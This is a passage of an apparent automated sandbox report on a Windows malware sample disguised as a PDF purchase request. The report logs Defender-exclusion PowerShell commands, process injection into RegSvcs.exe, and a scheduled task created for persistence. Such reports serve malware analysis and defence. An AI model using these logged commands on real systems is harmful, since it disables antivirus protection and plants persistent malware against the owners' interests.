                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98621
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98512
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98077
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97731
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95811
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95439
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95169
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94294
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94078
                    Source: RegSvcs.exe, 0000000A.00000002.1488316798.0000000005EA0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe"
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B93008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B39008Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeQueries volume information: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
